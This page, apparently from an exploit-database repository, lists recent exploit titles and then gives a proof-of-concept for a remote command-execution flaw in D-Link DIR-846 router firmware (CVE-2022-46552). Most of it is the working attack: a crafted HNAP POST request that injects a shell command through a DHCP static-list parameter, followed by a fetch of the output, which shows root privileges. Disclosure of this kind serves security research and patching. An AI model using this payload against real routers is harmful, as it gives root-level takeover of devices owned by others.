d46ab98863
32 changes to exploits/shellcodes/ghdb Answerdev 1.0.3 - Account Takeover D-Link DIR-846 - Remote Command Execution (RCE) vulnerability Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow ERPNext 12.29 - Cross-Site Scripting (XSS) Liferay Portal 6.2.5 - Insecure Permissions GNU screen v4.9.0 - Privilege Escalation Apache Tomcat 10.1 - Denial Of Service PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) BTCPay Server v1.7.4 - HTML Injection. Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS) ImageMagick 7.1.0-49 - DoS bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) CKEditor 5 35.4.0 - Cross-Site Scripting (XSS) Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) Froxlor 2.0.3 Stable - Remote Code Execution (RCE) ImageMagick 7.1.0-49 - Arbitrary File Read itech TrainSmart r1044 - SQL injection Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) PhotoShow 3.0 - Remote Code Execution projectSend r1605 - Remote Code Exectution RCE Responsive FileManager 9.9.5 - Remote Code Execution (RCE) zstore 6.6.0 - Cross-Site Scripting (XSS) Binwalk v2.3.2 - Remote Command Execution (RCE) XWorm Trojan 2.1 - Null Pointer Derefernce DoS Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) Linux/x86_64 - bash Shellcode with xor encoding
87 lines
No EOL
2.5 KiB
Text
87 lines
No EOL
2.5 KiB
Text
# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability
|
|
# Google Dork: NA
|
|
# Date: 30/01/2023
|
|
# Exploit Author: Françoa Taffarel
|
|
# Vendor Homepage:
|
|
https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
|
|
# Software Link:
|
|
https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
|
|
# Version: DIR846enFW100A53DBR-Retail
|
|
# Tested on: D-LINK DIR-846
|
|
# CVE : CVE-2022-46552
|
|
|
|
D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote
|
|
command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist
|
|
parameter. This vulnerability is exploited via a crafted POST request.
|
|
|
|
### Malicious POST Request
|
|
```
|
|
POST /HNAP1/ HTTP/1.1
|
|
Host: 192.168.0.1
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
|
|
Firefox/107.0
|
|
Accept: application/json
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/json
|
|
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
|
|
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
|
|
Content-Length: 171
|
|
Origin: http://192.168.0.1
|
|
Connection: close
|
|
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
|
|
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;
|
|
PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4
|
|
|
|
{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
|
|
```
|
|
|
|
|
|
### Response
|
|
|
|
```
|
|
HTTP/1.1 200 OK
|
|
X-Powered-By: PHP/7.1.9
|
|
Expires: Thu, 19 Nov 1981 08:52:00 GMT
|
|
Cache-Control: no-store, no-cache, must-revalidate
|
|
Pragma: no-cache
|
|
Content-type: text/html; charset=UTF-8
|
|
Connection: close
|
|
Date: Thu, 01 Dec 2022 11:03:54 GMT
|
|
Server: lighttpd/1.4.35
|
|
Content-Length: 68
|
|
|
|
{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
|
|
```
|
|
|
|
|
|
### Data from RCE Request
|
|
|
|
```
|
|
GET /HNAP1/rce_confirmed HTTP/1.1
|
|
Host: 192.168.0.1
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101
|
|
Firefox/107.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: close
|
|
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;
|
|
PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
|
|
Upgrade-Insecure-Requests: 1
|
|
```
|
|
|
|
|
|
### Response
|
|
|
|
```
|
|
HTTP/1.1 200 OK
|
|
Content-Type: application/octet-stream
|
|
Accept-Ranges: bytes
|
|
Content-Length: 24
|
|
Connection: close
|
|
Date: Thu, 01 Dec 2022 23:24:28 GMT
|
|
Server: lighttpd/1.4.35
|
|
|
|
uid=0(root) gid=0(root)
|
|
``` |